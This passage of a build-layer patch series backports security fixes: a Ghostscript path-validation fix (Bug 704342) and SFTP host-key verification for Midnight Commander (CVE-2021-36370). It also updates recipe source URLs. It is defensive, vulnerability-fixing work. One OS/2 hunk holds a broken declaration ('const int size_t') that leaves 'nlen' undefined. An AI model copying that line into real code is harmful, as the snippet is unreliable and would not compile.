+@@ -168,8 +168,16 @@ mswin_printer_fopen(gx_io_device * iodev, const char *fname, const char *access,
+ uintptr_t *ptid = &((tid_t *)(iodev->state))->tid;
+ gs_lib_ctx_t *ctx = mem->gs_lib_ctx;
+ gs_fs_list_t *fs = ctx->core->fs;
++ const size_t preflen = strlen(iodev->dname);
++ const size_t nlen = strlen(fname);
+
+- if (gp_validate_path(mem, fname, access) != 0)
++ if (preflen + nlen >= gp_file_name_sizeof)
++ return_error(gs_error_invalidaccess);
++
++ memcpy(pname, iodev->dname, preflen);
++ memcpy(pname + preflen, fname, nlen + 1);
++
++ if (gp_validate_path(mem, pname, access) != 0)
+ return gs_error_invalidfileaccess;
+
+ /* First we try the open_printer method. */
+diff --git a/base/gp_os2pr.c b/base/gp_os2pr.c
+index f852c71fc..ba54cde66 100644
+--- a/base/gp_os2pr.c
++++ b/base/gp_os2pr.c
+@@ -107,9 +107,20 @@ os2_printer_fopen(gx_io_device * iodev, const char *fname, const char *access,
+ FILE ** pfile, char *rfname, uint rnamelen)
+ {
+ os2_printer_t *pr = (os2_printer_t *)iodev->state;
+- char driver_name[256];
++ char driver_name[gp_file_name_sizeof];
+ gs_lib_ctx_t *ctx = mem->gs_lib_ctx;
+ gs_fs_list_t *fs = ctx->core->fs;
++ const size_t preflen = strlen(iodev->dname);
++ const int size_t = strlen(fname);
++
++ if (preflen + nlen >= gp_file_name_sizeof)
++ return_error(gs_error_invalidaccess);
++
++ memcpy(driver_name, iodev->dname, preflen);
++ memcpy(driver_name + preflen, fname, nlen + 1);
++
++ if (gp_validate_path(mem, driver_name, access) != 0)
++ return gs_error_invalidfileaccess;
+
+ /* First we try the open_printer method. */
+ /* Note that the loop condition here ensures we don't
+diff --git a/base/gslibctx.c b/base/gslibctx.c
+index 6dfed6cd5..318039fad 100644
+--- a/base/gslibctx.c
++++ b/base/gslibctx.c
+@@ -655,82 +655,39 @@ rewrite_percent_specifiers(char *s)
+ int
+ gs_add_outputfile_control_path(gs_memory_t *mem, const char *fname)
+ {
+- char *fp, f[gp_file_name_sizeof];
+- const int pipe = 124; /* ASCII code for '|' */
+- const int len = strlen(fname);
+- int i, code;
++ char f[gp_file_name_sizeof];
++ int code;
+
+ /* Be sure the string copy will fit */
+- if (len >= gp_file_name_sizeof)
++ if (strlen(fname) >= gp_file_name_sizeof)
+ return gs_error_rangecheck;
+ strcpy(f, fname);
+- fp = f;
+ /* Try to rewrite any %d (or similar) in the string */
+ rewrite_percent_specifiers(f);
+- for (i = 0; i < len; i++) {
+- if (f[i] == pipe) {
+- fp = &f[i + 1];
+- /* Because we potentially have to check file permissions at two levels
+- for the output file (gx_device_open_output_file and the low level
+- fopen API, if we're using a pipe, we have to add both the full string,
+- (including the '|', and just the command to which we pipe - since at
+- the pipe_fopen(), the leading '|' has been stripped.
+- */
+- code = gs_add_control_path(mem, gs_permit_file_writing, f);
+- if (code < 0)
+- return code;
+- code = gs_add_control_path(mem, gs_permit_file_control, f);
+- if (code < 0)
+- return code;
+- break;
+- }
+- if (!IS_WHITESPACE(f[i]))
+- break;
+- }
+- code = gs_add_control_path(mem, gs_permit_file_control, fp);
++
++ code = gs_add_control_path(mem, gs_permit_file_control, f);
+ if (code < 0)
+ return code;
+- return gs_add_control_path(mem, gs_permit_file_writing, fp);
++ return gs_add_control_path(mem, gs_permit_file_writing, f);
+ }
+
+ int
+ gs_remove_outputfile_control_path(gs_memory_t *mem, const char *fname)
+ {
+- char *fp, f[gp_file_name_sizeof];
+- const int pipe = 124; /* ASCII code for '|' */
+- const int len = strlen(fname);
+- int i, code;
++ char f[gp_file_name_sizeof];
++ int code;
+
+ /* Be sure the string copy will fit */
+- if (len >= gp_file_name_sizeof)
++ if (strlen(fname) >= gp_file_name_sizeof)
+ return gs_error_rangecheck;
+ strcpy(f, fname);
+- fp = f;
+ /* Try to rewrite any %d (or similar) in the string */
+- for (i = 0; i < len; i++) {
+- if (f[i] == pipe) {
+- fp = &f[i + 1];
+- /* Because we potentially have to check file permissions at two levels
+- for the output file (gx_device_open_output_file and the low level
+- fopen API, if we're using a pipe, we have to add both the full string,
+- (including the '|', and just the command to which we pipe - since at
+- the pipe_fopen(), the leading '|' has been stripped.
+- */
+- code = gs_remove_control_path(mem, gs_permit_file_writing, f);
+- if (code < 0)
+- return code;
+- code = gs_remove_control_path(mem, gs_permit_file_control, f);
+- if (code < 0)
+- return code;
+- break;
+- }
+- if (!IS_WHITESPACE(f[i]))
+- break;
+- }
+- code = gs_remove_control_path(mem, gs_permit_file_control, fp);
++ rewrite_percent_specifiers(f);
++
++ code = gs_remove_control_path(mem, gs_permit_file_control, f);
+ if (code < 0)
+ return code;
+- return gs_remove_control_path(mem, gs_permit_file_writing, fp);
++ return gs_remove_control_path(mem, gs_permit_file_writing, f);
+ }
+
+ int
+--
+2.33.0
+
diff --git a/meta/recipes-extended/ghostscript/ghostscript_9.53.3.bb b/meta/recipes-extended/ghostscript/ghostscript_9.53.3.bb
index 35826c25498..216822478fc 100644
--- a/meta/recipes-extended/ghostscript/ghostscript_9.53.3.bb
+++ b/meta/recipes-extended/ghostscript/ghostscript_9.53.3.bb
@@ -33,6 +33,7 @@ SRC_URI_BASE = "https://github.com/ArtifexSoftware/ghostpdl-downloads/releases/d
file://do-not-check-local-libpng-source.patch \
file://avoid-host-contamination.patch \
file://mkdir-p.patch \
+ file://0001-Bug-704342-Include-device-specifier-strings-in-acces.patch \
"
SRC_URI = "${SRC_URI_BASE} \
diff --git a/meta/recipes-extended/go-examples/go-helloworld_0.1.bb b/meta/recipes-extended/go-examples/go-helloworld_0.1.bb
index c51f163e9b5..3b738f82e74 100644
--- a/meta/recipes-extended/go-examples/go-helloworld_0.1.bb
+++ b/meta/recipes-extended/go-examples/go-helloworld_0.1.bb
@@ -5,7 +5,7 @@ HOMEPAGE = "https://golang.org/"
LICENSE = "MIT"
LIC_FILES_CHKSUM = "file://${COMMON_LICENSE_DIR}/MIT;md5=0835ade698e0bcf8506ecda2f7b4f302"
-SRC_URI = "git://${GO_IMPORT}"
+SRC_URI = "git://${GO_IMPORT};branch=master;protocol=https"
SRCREV = "46695d81d1fae905a270fb7db8a4d11a334562fe"
UPSTREAM_CHECK_COMMITS = "1"
diff --git a/meta/recipes-extended/iputils/iputils_s20200821.bb b/meta/recipes-extended/iputils/iputils_s20200821.bb
index e43abf2629f..dd541d4d487 100644
--- a/meta/recipes-extended/iputils/iputils_s20200821.bb
+++ b/meta/recipes-extended/iputils/iputils_s20200821.bb
@@ -10,7 +10,7 @@ LIC_FILES_CHKSUM = "file://LICENSE;md5=55aa8c9fcad0691cef0ecd420361e390"
DEPENDS = "gnutls"
-SRC_URI = "git://github.com/iputils/iputils \
+SRC_URI = "git://github.com/iputils/iputils;branch=master;protocol=https \
file://0001-rarpd-rdisc-Drop-PrivateUsers.patch \
"
SRCREV = "23c3782ae0c7f9c6ae59dbed8ad9204f8758542b"
diff --git a/meta/recipes-extended/libaio/libaio_0.3.112.bb b/meta/recipes-extended/libaio/libaio_0.3.112.bb
index b3606474a54..3892f3244e1 100644
--- a/meta/recipes-extended/libaio/libaio_0.3.112.bb
+++ b/meta/recipes-extended/libaio/libaio_0.3.112.bb
@@ -5,7 +5,7 @@ HOMEPAGE = "http://lse.sourceforge.net/io/aio.html"
LICENSE = "LGPLv2.1+"
LIC_FILES_CHKSUM = "file://COPYING;md5=d8045f3b8f929c1cb29a1e3fd737b499"
-SRC_URI = "git://pagure.io/libaio.git;protocol=https \
+SRC_URI = "git://pagure.io/libaio.git;protocol=https;branch=master \
file://00_arches.patch \
file://libaio_fix_for_mips_syscalls.patch \
file://system-linkage.patch \
diff --git a/meta/recipes-extended/libnsl/libnsl2_git.bb b/meta/recipes-extended/libnsl/libnsl2_git.bb
index badb71d9774..0690d4cd3b4 100644
--- a/meta/recipes-extended/libnsl/libnsl2_git.bb
+++ b/meta/recipes-extended/libnsl/libnsl2_git.bb
@@ -14,7 +14,7 @@ PV = "1.3.0"
SRCREV = "fbad7b36acaa89a54023930af70805649f962999"
-SRC_URI = "git://github.com/thkukuk/libnsl \
+SRC_URI = "git://github.com/thkukuk/libnsl;branch=master;protocol=https \
"
S = "${WORKDIR}/git"
diff --git a/meta/recipes-extended/libnss-nis/libnss-nis.bb b/meta/recipes-extended/libnss-nis/libnss-nis.bb
index a1d914e871f..984cc98fc2a 100644
--- a/meta/recipes-extended/libnss-nis/libnss-nis.bb
+++ b/meta/recipes-extended/libnss-nis/libnss-nis.bb
@@ -17,7 +17,7 @@ PV = "3.1+git${SRCPV}"
SRCREV = "062f31999b35393abf7595cb89dfc9590d5a42ad"
-SRC_URI = "git://github.com/thkukuk/libnss_nis \
+SRC_URI = "git://github.com/thkukuk/libnss_nis;branch=master;protocol=https \
"
S = "${WORKDIR}/git"
diff --git a/meta/recipes-extended/libsolv/libsolv_0.7.17.bb b/meta/recipes-extended/libsolv/libsolv_0.7.17.bb
index fa6e8a3c4de..2b5da4d9326 100644
--- a/meta/recipes-extended/libsolv/libsolv_0.7.17.bb
+++ b/meta/recipes-extended/libsolv/libsolv_0.7.17.bb
@@ -8,7 +8,7 @@ LIC_FILES_CHKSUM = "file://LICENSE.BSD;md5=62272bd11c97396d4aaf1c41bc11f7d8"
DEPENDS = "expat zlib"
-SRC_URI = "git://github.com/openSUSE/libsolv.git \
+SRC_URI = "git://github.com/openSUSE/libsolv.git;branch=master;protocol=https \
"
SRCREV = "4bc791c0d235eb14bfe4c5da607206bfdfa6983d"
diff --git a/meta/recipes-extended/ltp/ltp_20210121.bb b/meta/recipes-extended/ltp/ltp_20210121.bb
index 17adbf43f0a..e816244f8cf 100644
--- a/meta/recipes-extended/ltp/ltp_20210121.bb
+++ b/meta/recipes-extended/ltp/ltp_20210121.bb
@@ -33,7 +33,7 @@ SRCREV = "4d005621edd109d119627eb9210b224a63bf22cb"
PR = "r4"
HASHEQUIV_HASH_VERSION .= ".4"
-SRC_URI = "git://github.com/linux-test-project/ltp.git \
+SRC_URI = "git://github.com/linux-test-project/ltp.git;branch=master;protocol=https \
file://0001-build-Add-option-to-select-libc-implementation.patch \
file://0007-Fix-test_proc_kill-hanging.patch \
file://0001-Add-more-musl-exclusions.patch \
diff --git a/meta/recipes-extended/mc/files/CVE-2021-36370.patch b/meta/recipes-extended/mc/files/CVE-2021-36370.patch
new file mode 100644
index 00000000000..d6a26871bd7
--- /dev/null
+++ b/meta/recipes-extended/mc/files/CVE-2021-36370.patch
@@ -0,0 +1,609 @@
+Backport patch to fix CVE-2021-36370.
+
+Upstream-Status: Backport [https://github.com/MidnightCommander/mc/commit/9235d3c]
+CVE: CVE-2021-36370
+
+Signed-off-by: Kai Kang <kai.kang@windriver.com>
+
+From 9235d3c232d13ad7f973346077c9cf2eaa77dc5f Mon Sep 17 00:00:00 2001
+From: Andrew Borodin <aborodin@vmail.ru>
+Date: Mon, 12 Jul 2021 08:48:18 +0300
+Subject: [PATCH] SFTPFS: verify server fingerprint (fix CVE-2021-36370).
+
+Use ~/.ssh/known_hosts file to verify server fingerprint
+using ssh way:
+
+$ ssh localhost
+The authenticity of host 'localhost (127.0.0.1)' can't be established.
+ED25519 key fingerprint is SHA256:FzqKTNTroFuNUj1wUzSeV2x/1lpcESnT0ZRCmq5H6o8.
+Are you sure you want to continue connecting (yes/no)? no
+ssh: Host key verification failed.
+
+$ ssh localhost
+The authenticity of host 'localhost (127.0.0.1)' can't be established.
+ED25519 key fingerprint is SHA256:FzqKTNTroFuNUj1wUzSeV2x/1lpcESnT0ZRCmq5H6o8.
+Are you sure you want to continue connecting (yes/no)? yes
+Warning: Permanently added 'localhost' (ED25519) to the list of known hosts.
+andrew@localhost's password:
+
+Thanks the Curl project for the used code.
+
+Signed-off-by: Andrew Borodin <aborodin@vmail.ru>
+Signed-off-by: Yury V. Zaytsev <yury.zaytsev@moneymeets.com>
+---
+ doc/man/mc.1.in | 15 ++
+ doc/man/ru/mc.1.in | 14 ++
+ src/vfs/sftpfs/connection.c | 428 +++++++++++++++++++++++++++++++++++-
+ src/vfs/sftpfs/internal.h | 5 +-
+ 4 files changed, 452 insertions(+), 10 deletions(-)
+
+diff --git a/doc/man/mc.1.in b/doc/man/mc.1.in
+index c0c06e32f7..7a3d118384 100644
+--- a/doc/man/mc.1.in
++++ b/doc/man/mc.1.in
+@@ -3364,6 +3364,21 @@ Examples:
+ sftp://joe@noncompressed.ssh.edu/private
+ sftp://joe@somehost.ssh.edu:2222/private
+ .fi
++.PP
++When establishing the connection, server key fingerprint is verified using
++the ~/.ssh/known_hosts file. If the host/key pair is not found or the host is found,
++but the key doesn't match, an appropriate message is shown.
++There are three buttons in the message dialog:
++.PP
++.B [Yes]
++add new host/key pair to the ~/.ssh/known_hosts file and continue.
++.PP
++.B [Ignore]
++do not add new host/key pair to the ~/.ssh/known_hosts file, but continue
++nevertheless (at you own risk).
++.PP
++.B [No]
++abort connection.
+ .\"NODE " Undelete File System"
+ .SH " Undelete File System"
+ On Linux systems, if you asked configure to use the ext2fs undelete
+diff --git a/doc/man/ru/mc.1.in b/doc/man/ru/mc.1.in
+index 7609da1127..bc0c1810a9 100644
+--- a/doc/man/ru/mc.1.in
++++ b/doc/man/ru/mc.1.in
+@@ -3874,6 +3874,20 @@ bash\-совместимая оболочка shell.
+ sftp://joe@noncompressed.ssh.edu/private
+ sftp://joe@somehost.ssh.edu:2222/private
+ .fi
++При установлении соединения происходит проверка ключа сервера с использованием
++файла ~/.ssh/known_hosts file. Если пара сервер/ключ в этом файле не найдена
++или сервер найден, но ключ не соответствует, пользователю показывается
++окно с соответствующим сообщением, содержащее три кнопки:
++.PP
++.B [Да]
++добавить новую пару сервер/ключ в файл ~/.ssh/known_hosts и продолжить соединение.
++.PP
++.B [Игнорировать]
++не добавлять новую пару сервер/ключ в файл ~/.ssh/known_hosts и всё равно
++продолжить соединение (на свой страх и риск).
++.PP
++.B [Нет]
++прервать соединение.
+ .\"NODE " Undelete File System"
+ .SH " Файловая система UFS (Undelete File System)"
+ В ОС Linux можно сконфигурировать файловую систему ext2fs, используемую
+diff --git a/src/vfs/sftpfs/connection.c b/src/vfs/sftpfs/connection.c
+index 9f8ea5633b..acd5026515 100644
+--- a/src/vfs/sftpfs/connection.c
++++ b/src/vfs/sftpfs/connection.c
+@@ -42,6 +42,8 @@
+ #include "lib/util.h"
+ #include "lib/tty/tty.h" /* tty_enable_interrupt_key () */
+ #include "lib/vfs/utilvfs.h"
++#include "lib/mcconfig.h" /* mc_config_get_home_dir () */
++#include "lib/widget.h" /* query_dialog () */
+
+ #include "internal.h"
+
+@@ -49,10 +51,37 @@
+
+ /*** file scope macro definitions ****************************************************************/
+
++#define SHA1_DIGEST_LENGTH 20
++
+ /*** file scope type declarations ****************************************************************/
+
+ /*** file scope variables ************************************************************************/
+
++#ifdef LIBSSH2_KNOWNHOST_KEY_ED25519
++static const char *const hostkey_method_ssh_ed25519 = "ssh-ed25519";
++#endif
++#ifdef LIBSSH2_KNOWNHOST_KEY_ECDSA_521
++static const char *const hostkey_method_ssh_ecdsa_521 = "ecdsa-sha2-nistp521";
++#endif
++#ifdef LIBSSH2_KNOWNHOST_KEY_ECDSA_384
++static const char *const hostkey_method_ssh_ecdsa_384 = "ecdsa-sha2-nistp384";
++#endif
++#ifdef LIBSSH2_KNOWNHOST_KEY_ECDSA_256
++static const char *const hostkey_method_ssh_ecdsa_256 = "ecdsa-sha2-nistp256";
++#endif
++static const char *const hostkey_method_ssh_rsa = "ssh-rsa";
++static const char *const hostkey_method_ssh_dss = "ssh-dss";
++
++/**
++ *
++ * The current implementation of know host key checking has following limitations:
++ *
++ * - Only plain-text entries are supported (`HashKnownHosts no` OpenSSH option)
++ * - Only HEX-encoded SHA1 fingerprint display is supported (`FingerprintHash` OpenSSH option)
++ * - Resolved IP addresses are *not* saved/validated along with the hostnames
++ *
++ */
++
+ static const char *kbi_passwd = NULL;
+ static const struct vfs_s_super *kbi_super = NULL;
+
+@@ -70,9 +99,12 @@ static const struct vfs_s_super *kbi_super = NULL;
+ static int
+ sftpfs_open_socket (struct vfs_s_super *super, GError ** mcerror)
+ {
++ sftpfs_super_t *sftpfs_super = SFTP_SUPER (super);
+ struct addrinfo hints, *res = NULL, *curr_res;
+ int my_socket = 0;
+ char port[BUF_TINY];
++ static char address_ipv4[INET_ADDRSTRLEN];
++ static char address_ipv6[INET6_ADDRSTRLEN];
+ int e;
+
+ mc_return_val_if_error (mcerror, LIBSSH2_INVALID_SOCKET);
+@@ -120,6 +152,30 @@ sftpfs_open_socket (struct vfs_s_super *super, GError ** mcerror)
+ {
+ int save_errno;
+
++ switch (curr_res->ai_addr->sa_family)
++ {
++ case AF_INET:
++ sftpfs_super->ip_address =
++ inet_ntop (AF_INET, &((struct sockaddr_in *) curr_res->ai_addr)->sin_addr,
++ address_ipv4, INET_ADDRSTRLEN);
++ break;
++ case AF_INET6:
++ sftpfs_super->ip_address =
++ inet_ntop (AF_INET6, &((struct sockaddr_in6 *) curr_res->ai_addr)->sin6_addr,
++ address_ipv6, INET6_ADDRSTRLEN);
++ break;
++ default:
++ sftpfs_super->ip_address = NULL;
++ }
++
++ if (sftpfs_super->ip_address == NULL)
++ {
++ mc_propagate_error (mcerror, 0, "%s",
++ _("sftp: failed to convert remote host IP address into text form"));
++ my_socket = LIBSSH2_INVALID_SOCKET;
++ goto ret;
++ }
++
+ my_socket = socket (curr_res->ai_family, curr_res->ai_socktype, curr_res->ai_protocol);
+
+ if (my_socket < 0)
+@@ -161,8 +217,358 @@ sftpfs_open_socket (struct vfs_s_super *super, GError ** mcerror)
+ }
+
+ /* --------------------------------------------------------------------------------------------- */
++
++/**
++ * Read ~/.ssh/known_hosts file.
++ *
++ * @param super connection data
++ * @param mcerror pointer to the error handler
++ * @return TRUE on success, FALSE otherwise
++ *
++ * Thanks the Curl project for the code used in this function.
++ */
++static gboolean
++sftpfs_read_known_hosts (struct vfs_s_super *super, GError ** mcerror)
++{
++ sftpfs_super_t *sftpfs_super = SFTP_SUPER (super);
++ struct libssh2_knownhost *store = NULL;
++ int rc;
++ gboolean found = FALSE;
++
++ sftpfs_super->known_hosts = libssh2_knownhost_init (sftpfs_super->session);
++ if (sftpfs_super->known_hosts == NULL)
++ goto err;
++
++ sftpfs_super->known_hosts_file =
++ mc_build_filename (mc_config_get_home_dir (), ".ssh", "known_hosts", (char *) NULL);
++ rc = libssh2_knownhost_readfile (sftpfs_super->known_hosts, sftpfs_super->known_hosts_file,
++ LIBSSH2_KNOWNHOST_FILE_OPENSSH);
++ if (rc > 0)
++ {
++ const char *kh_name_end = NULL;
++
++ while (!found && libssh2_knownhost_get (sftpfs_super->known_hosts, &store, store) == 0)
++ {
++ /* For non-standard ports, the name will be enclosed in
++ * square brackets, followed by a colon and the port */
++ if (store == NULL)
++ continue;
++
++ if (store->name == NULL)
++ found = TRUE;
++ else if (store->name[0] != '[')
++ found = strcmp (store->name, super->path_element->host) == 0;
++ else
++ {
++ int port;
++
++ kh_name_end = strstr (store->name, "]:");
++ if (kh_name_end == NULL)
++ /* Invalid host pattern */
++ continue;
++
++ port = (int) g_ascii_strtoll (kh_name_end + 2, NULL, 10);
++ if (port == super->path_element->port)
++ {
++ size_t kh_name_size;
++
++ kh_name_size = strlen (store->name) - 1 - strlen (kh_name_end);
++ found = strncmp (store->name + 1, super->path_element->host, kh_name_size) == 0;
++ }
++ }
++ }
++ }
++
++ if (found)
++ {
++ int mask;
++ const char *hostkey_method = NULL;
++
++ mask = store->typemask & LIBSSH2_KNOWNHOST_KEY_MASK;
++
++ switch (mask)
++ {
++#ifdef LIBSSH2_KNOWNHOST_KEY_ED25519
++ case LIBSSH2_KNOWNHOST_KEY_ED25519:
++ hostkey_method = hostkey_method_ssh_ed25519;
++ break;
++#endif
++#ifdef LIBSSH2_KNOWNHOST_KEY_ECDSA_521
++ case LIBSSH2_KNOWNHOST_KEY_ECDSA_521:
++ hostkey_method = hostkey_method_ssh_ecdsa_521;
++ break;
++#endif
++#ifdef LIBSSH2_KNOWNHOST_KEY_ECDSA_384
++ case LIBSSH2_KNOWNHOST_KEY_ECDSA_384:
++ hostkey_method = hostkey_method_ssh_ecdsa_384;
++ break;
++#endif
++#ifdef LIBSSH2_KNOWNHOST_KEY_ECDSA_256
++ case LIBSSH2_KNOWNHOST_KEY_ECDSA_256:
++ hostkey_method = hostkey_method_ssh_ecdsa_256;
++ break;
++#endif
++ case LIBSSH2_KNOWNHOST_KEY_SSHRSA:
++ hostkey_method = hostkey_method_ssh_rsa;
++ break;
++ case LIBSSH2_KNOWNHOST_KEY_SSHDSS:
++ hostkey_method = hostkey_method_ssh_dss;
++ break;
++ case LIBSSH2_KNOWNHOST_KEY_RSA1:
++ mc_propagate_error (mcerror, 0, "%s",
++ _("sftp: found host key of unsupported type: RSA1"));
++ return FALSE;
++ default:
++ mc_propagate_error (mcerror, 0, "%s %d", _("sftp: unknown host key type:"), mask);
++ return FALSE;
++ }
++
++ rc = libssh2_session_method_pref (sftpfs_super->session, LIBSSH2_METHOD_HOSTKEY,
++ hostkey_method);
++ if (rc < 0)
++ goto err;
++ }
++
++ return TRUE;
++
++ err:
++ {
++ int sftp_errno;
++
++ sftp_errno = libssh2_session_last_errno (sftpfs_super->session);
++ sftpfs_ssherror_to_gliberror (sftpfs_super, sftp_errno, mcerror);
++ }
++ return FALSE;
++}
++
++/* --------------------------------------------------------------------------------------------- */
++
++/**
++ * Write new host + key pair to the ~/.ssh/known_hosts file.
++ *
++ * @param super connection data
++ * @param remote_key he key for the remote host
++ * @param remote_key_len length of @remote_key
++ * @param type_mask info about format of host name, key and key type
++ * @return 0 on success, regular libssh2 error code otherwise
++ *
++ * Thanks the Curl project for the code used in this function.
++ */
++static int
++sftpfs_update_known_hosts (struct vfs_s_super *super, const char *remote_key, size_t remote_key_len,
++ int type_mask)
++{
++ sftpfs_super_t *sftpfs_super = SFTP_SUPER (super);
++ int rc;
++
++ /* add this host + key pair */
++ rc = libssh2_knownhost_addc (sftpfs_super->known_hosts, super->path_element->host, NULL,
++ remote_key, remote_key_len, NULL, 0, type_mask, NULL);
++ if (rc < 0)
++ return rc;
++
++ /* write the entire in-memory list of known hosts to the known_hosts file */
++ rc = libssh2_knownhost_writefile (sftpfs_super->known_hosts, sftpfs_super->known_hosts_file,
++ LIBSSH2_KNOWNHOST_FILE_OPENSSH);
++
++ if (rc < 0)
++ return rc;
++
++ (void) message (D_NORMAL, _("Information"),
++ _("Permanently added\n%s (%s)\nto the list of known hosts."),
++ super->path_element->host, sftpfs_super->ip_address);
++
++ return 0;
++}
++
++/* --------------------------------------------------------------------------------------------- */
++/**
++ * Compute and return readable host key fingerprint hash.
++ *
++ * @param session libssh2 session handle
++ * @return pointer to static buffer on success, NULL otherwise
++ */
++static const char *
++sftpfs_compute_fingerprint_hash (LIBSSH2_SESSION * session)
++{
++ static char result[SHA1_DIGEST_LENGTH * 3 + 1]; /* "XX:" for each byte, and EOL */
++ const char *fingerprint;
++ size_t i;
++
++ /* The fingerprint points to static storage (!), don't free() it. */
++ fingerprint = libssh2_hostkey_hash (session, LIBSSH2_HOSTKEY_HASH_SHA1);
++ if (fingerprint == NULL)
++ return NULL;
++
++ for (i = 0; i < SHA1_DIGEST_LENGTH && i * 3 < sizeof (result) - 1; i++)
++ g_snprintf ((gchar *) (result + i * 3), 4, "%02x:", (guint8) fingerprint[i]);
++
++ /* remove last ":" */
++ result[i * 3 - 1] = '\0';
++
++ return result;
++}
++
++/* --------------------------------------------------------------------------------------------- */
++
+ /**
+- * Recognize authenticaion types supported by remote side and filling internal 'super' structure by
++ * Process host info found in ~/.ssh/known_hosts file.
++ *
++ * @param super connection data
++ * @param mcerror pointer to the error handler
++ * @return TRUE on success, FALSE otherwise
++ *
++ * Thanks the Curl project for the code used in this function.
++ */
++static gboolean
++sftpfs_process_known_host (struct vfs_s_super *super, GError ** mcerror)
++{
++ sftpfs_super_t *sftpfs_super = SFTP_SUPER (super);
++ const char *remote_key;
++ const char *key_type;
++ const char *fingerprint_hash;
++ size_t remote_key_len = 0;
++ int remote_key_type = LIBSSH2_HOSTKEY_TYPE_UNKNOWN;
++ int keybit = 0;
++ struct libssh2_knownhost *host = NULL;
++ int rc;
++ char *msg = NULL;
++ gboolean handle_query = FALSE;
++
++ remote_key = libssh2_session_hostkey (sftpfs_super->session, &remote_key_len, &remote_key_type);
++ if (remote_key == NULL || remote_key_len == 0
++ || remote_key_type == LIBSSH2_HOSTKEY_TYPE_UNKNOWN)
++ {
++ mc_propagate_error (mcerror, 0, "%s", _("sftp: cannot get the remote host key"));
++ return FALSE;
++ }
++
++ switch (remote_key_type)
++ {
++ case LIBSSH2_HOSTKEY_TYPE_RSA:
++ keybit = LIBSSH2_KNOWNHOST_KEY_SSHRSA;
++ key_type = "RSA";
++ break;
++ case LIBSSH2_HOSTKEY_TYPE_DSS:
++ keybit = LIBSSH2_KNOWNHOST_KEY_SSHDSS;
++ key_type = "DSS";
++ break;
++#ifdef LIBSSH2_HOSTKEY_TYPE_ECDSA_256
++ case LIBSSH2_HOSTKEY_TYPE_ECDSA_256:
++ keybit = LIBSSH2_KNOWNHOST_KEY_ECDSA_256;
++ key_type = "ECDSA";
++ break;
++#endif
++#ifdef LIBSSH2_HOSTKEY_TYPE_ECDSA_384
++ case LIBSSH2_HOSTKEY_TYPE_ECDSA_384:
++ keybit = LIBSSH2_KNOWNHOST_KEY_ECDSA_384;
++ key_type = "ECDSA";
++ break;
++#endif
++#ifdef LIBSSH2_HOSTKEY_TYPE_ECDSA_521
++ case LIBSSH2_HOSTKEY_TYPE_ECDSA_521:
++ keybit = LIBSSH2_KNOWNHOST_KEY_ECDSA_521;
++ key_type = "ECDSA";
++ break;
++#endif
++#ifdef LIBSSH2_HOSTKEY_TYPE_ED25519
++ case LIBSSH2_HOSTKEY_TYPE_ED25519:
++ keybit = LIBSSH2_KNOWNHOST_KEY_ED25519;
++ key_type = "ED25519";
++ break;
++#endif
++ default:
++ mc_propagate_error (mcerror, 0, "%s",
++ _("sftp: unsupported key type, can't check remote host key"));
++ return FALSE;
++ }
++
++ fingerprint_hash = sftpfs_compute_fingerprint_hash (sftpfs_super->session);
++ if (fingerprint_hash == NULL)
++ {
++ mc_propagate_error (mcerror, 0, "%s", _("sftp: can't compute host key fingerprint hash"));
++ return FALSE;
++ }
++
++ rc = libssh2_knownhost_checkp (sftpfs_super->known_hosts, super->path_element->host,
++ super->path_element->port, remote_key, remote_key_len,
++ LIBSSH2_KNOWNHOST_TYPE_PLAIN | LIBSSH2_KNOWNHOST_KEYENC_RAW |
++ keybit, &host);
++
++ switch (rc)
++ {
++ default:
++ case LIBSSH2_KNOWNHOST_CHECK_FAILURE:
++ /* something prevented the check to be made */
++ goto err;
++
++ case LIBSSH2_KNOWNHOST_CHECK_MATCH:
++ /* host + key pair matched -- OK */
++ break;
++
++ case LIBSSH2_KNOWNHOST_CHECK_NOTFOUND:
++ /* no host match was found -- add it to the known_hosts file */
++ msg = g_strdup_printf (_("The authenticity of host\n%s (%s)\ncan't be established!\n"
++ "%s key fingerprint hash is\nSHA1:%s.\n"
++ "Do you want to add it to the list of known hosts and continue connecting?"),
++ super->path_element->host, sftpfs_super->ip_address,
++ key_type, fingerprint_hash);
++ /* Select "No" initially */
++ query_set_sel (2);
++ rc = query_dialog (_("Warning"), msg, D_NORMAL, 3, _("&Yes"), _("&Ignore"), _("&No"));
++ g_free (msg);
++ handle_query = TRUE;
++ break;
++
++ case LIBSSH2_KNOWNHOST_CHECK_MISMATCH:
++ msg = g_strdup_printf (_("%s (%s)\nis found in the list of known hosts but\n"
++ "KEYS DO NOT MATCH! THIS COULD BE A MITM ATTACK!\n"
++ "Are you sure you want to add it to the list of known hosts and continue connecting?"),
++ super->path_element->host, sftpfs_super->ip_address);
++ /* Select "No" initially */
++ query_set_sel (2);
++ rc = query_dialog (MSG_ERROR, msg, D_ERROR, 3, _("&Yes"), _("&Ignore"), _("&No"));
++ g_free (msg);
++ handle_query = TRUE;
++ break;
++ }
++
++ if (handle_query)
++ switch (rc)
++ {
++ case 0:
++ /* Yes: add this host + key pair, continue connecting */
++ if (sftpfs_update_known_hosts (super, remote_key, remote_key_len,
++ LIBSSH2_KNOWNHOST_TYPE_PLAIN
++ | LIBSSH2_KNOWNHOST_KEYENC_RAW | keybit) < 0)
++ goto err;
++ break;
++ case 1:
++ /* Ignore: do not add this host + key pair, continue connecting anyway */
++ break;
++ case 2:
++ default:
++ mc_propagate_error (mcerror, 0, "%s", _("sftp: host key verification failed"));
++ /* No: abort connection */
++ goto err;
++ }
++
++ return TRUE;
++
++ err:
++ {
++ int sftp_errno;
++
++ sftp_errno = libssh2_session_last_errno (sftpfs_super->session);
++ sftpfs_ssherror_to_gliberror (sftpfs_super, sftp_errno, mcerror);
++ }
++
++ return FALSE;
++}
++
++/* --------------------------------------------------------------------------------------------- */
++/**
++ * Recognize authentication types supported by remote side and filling internal 'super' structure by
+ * proper enum's values.
+ *
+ * @param super connection data
+@@ -461,6 +867,9 @@ sftpfs_open_connection (struct vfs_s_super *super, GError ** mcerror)
+ if (sftpfs_super->session == NULL)
+ return (-1);
+
++ if (!sftpfs_read_known_hosts (super, mcerror))
++ return (-1);
++
+ /* ... start it up. This will trade welcome banners, exchange keys,
+ * and setup crypto, compression, and MAC layers
+ */
+@@ -475,13 +884,8 @@ sftpfs_open_connection (struct vfs_s_super *super, GError ** mcerror)
+ return (-1);
+ }
+
+- /* At this point we havn't yet authenticated. The first thing to do
+- * is check the hostkey's fingerprint against our known hosts Your app
+- * may have it hard coded, may go to a file, may present it to the
+- * user, that's your call
+- */
+- sftpfs_super->fingerprint =
